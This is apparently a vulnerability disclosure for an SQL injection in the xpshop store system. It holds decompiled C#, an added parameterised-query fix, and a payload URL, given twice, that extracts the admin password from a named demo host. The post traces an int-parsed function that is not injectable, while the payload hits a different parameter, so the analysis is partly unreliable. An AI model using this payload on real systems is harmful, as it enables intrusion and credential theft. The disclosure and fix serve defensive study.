xpshop online store system SQL injection (demo site)

Vulnerability author: 不能忍

Details:

Vulnerable location: xpshop.webui.MyRefund

protected void Page_Load(object sender, EventArgs e)
{
    // Both "type" and "Action" must be present in the query string.
    if (Utils.request(base.Request.QueryString["type"]) && Utils.request(base.Request.QueryString["Action"]))
    {
        string text = base.Request.QueryString["Action"];
        if (text != null)
        {
            if (!(text == "GetImg"))
            {
                if (text == "GetPackageGID")
                {
                    // "PackagePID" is parsed as an int and passed to GetPackagePdtGID (shown below).
                    base.Response.Write(new ProductDB().GetPackagePdtGID(int.Parse(base.Request.QueryString["PackagePID"])));
                }
            }
            else
            {
                // "pids" is handed to GetImg unchanged, straight from the query string.
                this.GetImg(base.Request.QueryString["pids"]);
            }
        }
    }
}

Following into the function GetPackagePdtGID:

public int GetPackagePdtGID(int productID)
{
    // The id is concatenated straight into the SQL text; no parameter is used.
    object obj = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, "select GoodsID from Goods where ProductID = " + productID, null);
    return (obj != null) ? ((int)obj) : 0;
}

No filtering at all: the value goes straight into the database query, and the result is echoed straight back!
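As an added example that is not part of the original post or of xpshop's code: the query from GetPackagePdtGID rewritten with a typed parameter, plus an integer-only check for a comma-separated list value such as pids before it reaches any query. SqlCommand is used directly, and the class name and connection handling are assumptions, because the parameter signature of the XpShopDB.ExecuteScalar helper is not shown on the page.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not xpshop's own code. SqlCommand is used directly because the
// parameter signature of the XpShopDB.ExecuteScalar helper is not shown on the page.
public static class GoodsLookupSafe
{
    // Parameterised replacement for GetPackagePdtGID: the id travels as a typed
    // SqlParameter, so it can never change the shape of the query text.
    public static int GetPackagePdtGID(string connectionString, int productID)
    {
        const string sql = "select GoodsID from Goods where ProductID = @ProductID";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.CommandType = CommandType.Text;
            cmd.Parameters.Add("@ProductID", SqlDbType.Int).Value = productID;
            conn.Open();
            object obj = cmd.ExecuteScalar();
            return (obj != null && obj != DBNull.Value) ? (int)obj : 0;
        }
    }

    // Validation for a comma-separated id list such as the "pids" query-string value
    // handed to GetImg: every entry must be a plain integer. A value carrying SQL
    // (anything beyond digits and commas) fails int.TryParse and is rejected before
    // any query is built; the caller then returns an error instead of querying.
    public static bool TryParseIdList(string pids, out int[] ids)
    {
        ids = new int[0];
        if (string.IsNullOrWhiteSpace(pids)) return false;
        string[] parts = pids.Split(',');
        var parsed = new int[parts.Length];
        for (int i = 0; i < parts.Length; i++)
        {
            if (!int.TryParse(parts[i].Trim(), out parsed[i])) return false;
        }
        ids = parsed;
        return true;
    }
}
```

With the list validated, each id can be bound as its own @p0, @p1, ... parameter in an IN clause; the ids never appear in the SQL string itself.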

payload:

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)--

Proof of vulnerability:

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)--

